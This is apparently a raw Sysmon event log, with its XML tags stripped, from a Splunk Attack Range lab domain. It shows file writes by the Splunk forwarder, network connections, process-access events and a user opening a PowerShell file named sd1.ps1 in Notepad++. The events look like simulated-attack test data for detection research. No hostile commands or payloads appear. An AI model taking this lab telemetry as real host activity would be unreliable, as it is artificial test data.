Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=530C285963F64A54E9E2D86C8345DCFD,SHA256=F3BC93D825D2EAD49DBC36A2FD912E5FFD94D8E03DCA82065C7AEB205E164EB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:24.581{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51160-false10.0.1.12-8000- 23542300x8000000000000000809285Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:32.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F1AB8FC378E30A34DD8463BCC9AD556,SHA256=9EC3B0FB4F7D837CDDC289DA18DC1A320129BF815D667E903AE7F2945FC8B1F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:33.367{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABD1001E3E4043BA65F265D3144E3B52,SHA256=1822F6818877EFC13BB323E8BA3B8E687D79CF8795EE7A11BC605C4B6ED541A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809287Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:33.922{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F369EA164F1B20F69FF750535663D9F7,SHA256=7565A8E5B092BEF174C7D4602E4486BE283C2231E7695C8A1DD0D16D9F02456B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809286Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:33.125{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AB787C9B2F608DD815D05425C94658C,SHA256=36EF8A0EE2997E1B69C361F014A81CBB0F2F04C6E433BA2F74AB554F321638DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:34.368{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF2FB03B0833AACE051FE484F7DA7887,SHA256=3CE899DDFC1396722BA4C485F82C7ED0A8B4FECB98D8AD2220D29D08E50C7F2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809289Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:32.922{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse62.80.172.54-51978-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809288Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:34.172{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFC5825F6C2D81D769D181CC93B70F22,SHA256=D81F1F3E005E42019B94A96324F7A2E289E82038A13F478198A4BF807C6F901E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:35.845{466BC892-02AF-60E8-1300-00000000CF01}9761444C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:35.383{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=621B683C0A4B407F6E00A79507C12AE5,SHA256=7124C758021C57D883FB2DB95277760F7D39EF0DFAB80F4216BE7370A369DE1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809290Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:35.176{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=688ACA23067EB46BF2141142430C5E00,SHA256=3D757B00B15C3709420DB72966615FCD43872438EF3140C61816CE5354387B56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:36.413{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7048F2C8062C9042A9BC328C704EF28B,SHA256=896ED10CF960A4557F23657E2DAEC778934A6E6172492651FFF78D65691BC1E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809292Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:34.367{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57384-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809291Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:36.176{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6F0F967B25AF6CDA9E72D79E858914C,SHA256=FFF5B783AC016F6124451B992EFA97E98772971DE8E2E3759B94C5FD86904159,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:37.681{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.681{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:37.565{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.565{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:37.565{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.565{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:37.565{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F6E1-60EB-AC7D-00000000CF01}5524C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.565{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F6E1-60EB-AC7D-00000000CF01}5524C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001052409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.554{466BC892-F6E1-60EB-AC7D-00000000CF01}5524C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" 
"C:\Temp\test\sd1.ps1"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 354300x80000000000000001052408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:29.716{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51161-false10.0.1.12-8000- 23542300x80000000000000001052407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.427{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51DC376A491EFC6A012F84C4A9CCBC9C,SHA256=31EA84A83B2064EC2A8C9D8B7799DA4DFF6202564C64ABA31C20B3C67F68FCEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809293Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:37.192{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6471F0415AC64107D7F106A155684AB9,SHA256=8C7446C91EE74A8CB18F1040C11CF975B5239A07A9BEDB9F18C69463613E5810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:38.612{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=71A37DA4588DAFD716A82299ECA48BBF,SHA256=624DDB888A62646B870F791B60312ADF9E3F56DAD789C888BD70582E23B7B993,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:38.544{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBF117E96FC513BB7862DF1080E1B9A1,SHA256=BF1E39E1BF898C51947C219B7FF89FD4726E311D07A53828DBA6258848366725,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:38.544{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F176F4646537EA9567C66FFB4D512A1,SHA256=B9081DA03919A5C86ACE36CFEB6ED79E7FBAD9399A800788910383554A3ED560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:38.442{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70AD64BB58FE5EB0E6AD54478C9A7E14,SHA256=7FA3246140281E7D4B0FCE588DFC265FE3344839EBCC9B838D076D81BE735664,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809294Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:38.192{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E24F91A591DB931346D39F2F465D32B,SHA256=FADFC69DA46232CDE88345D6A237CB1B6894380EC9B23B9147B9A91A047DF383,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:39.446{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=294867AA69078EF64F4974EDA03D74D5,SHA256=1C428D9557A485E8EF249E7E8932C5F1980DD635559544435D272B621D148792,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809295Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:39.208{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82424995199BE8357CB3AE8CC79D11E2,SHA256=85D063EAAEE6A85FB611D5E6E626B5FA5AA6A3062C12D530B8CB973A683F8676,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.866{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.866{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:40.782{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.782{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:40.782{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 